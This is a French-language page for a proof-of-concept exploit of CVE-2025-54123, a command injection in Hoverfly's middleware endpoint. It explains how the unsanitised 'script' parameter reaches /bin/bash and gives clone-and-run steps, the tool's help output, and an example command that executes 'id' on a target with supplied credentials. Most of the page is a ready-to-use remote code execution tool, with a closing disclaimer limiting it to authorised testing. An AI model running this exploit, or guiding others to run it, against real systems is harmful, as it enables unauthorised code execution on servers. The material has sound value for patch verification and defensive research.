
PoC CVE-2025-54123 - Hoverfly <= 1.11.3 - Injection de commandes dans le middleware authentifié
PoC CVE-2025-54123 - Injection de commande Middleware dans Hoverfly
Cette vulnérabilité affecte les versions de Hoverfly ≤ 1.11.3 et cible spécifiquement le point de terminaison /api/v2/hoverfly/middleware. Elle est causée par une validation et un assainissement insuffisants des entrées dans plusieurs fichiers, notamment middleware.go, local_middleware.go et hoverfly_service.go. L'entrée contrôlée par l'utilisateur fournie au paramètre script est passée directement à un binaire système (par exemple /bin/bash) sans vérifications appropriées, permettant l'exécution de code à distance (RCE) avec les privilèges du processus Hoverfly.
curlgit clone https://github.com/f4dee-backup/CVE-2025-54123
cd CVE-2025-54123
chmod +x CVE-2025-54123.sh
./CVE-2025-54123.sh -h
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ███████╗ ███████╗██╗ ██╗ ██╗██████╗ ██████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██╔════╝ ██╔════╝██║ ██║███║╚════██╗╚════██╗
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████╗█████╗███████╗███████║╚██║ █████╔╝ █████╔╝
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝╚════██║╚════██║ ██║██╔═══╝ ╚═══██╗
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗███████║ ███████║ ██║ ██║███████╗██████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚══════╝ ╚══════╝ ╚═╝ ╚═╝╚══════╝╚═════╝
Hoverfly <= 1.11.3 - Authenticated Middleware Command Injection
[?] Parameters description:
-t Target base URL (e.g., http://target:8888)
-u Valid username
-p Valid password
-c Command to execute (must be enclosed in double quotes)
-h Show this help panel
[i] Example:
./CVE-2025-54123.sh -t http://target.com:8888 -u admin -p password -c "id"
Cet exploit est destiné uniquement à des fins éducatives et de tests de sécurité autorisés.
Ne PAS utiliser cela contre des systèmes sans autorisation explicite. L'accès non autorisé peut être illégal.
L'auteur décline toute responsabilité en cas d'utilisation abusive ou de tout dommage causé.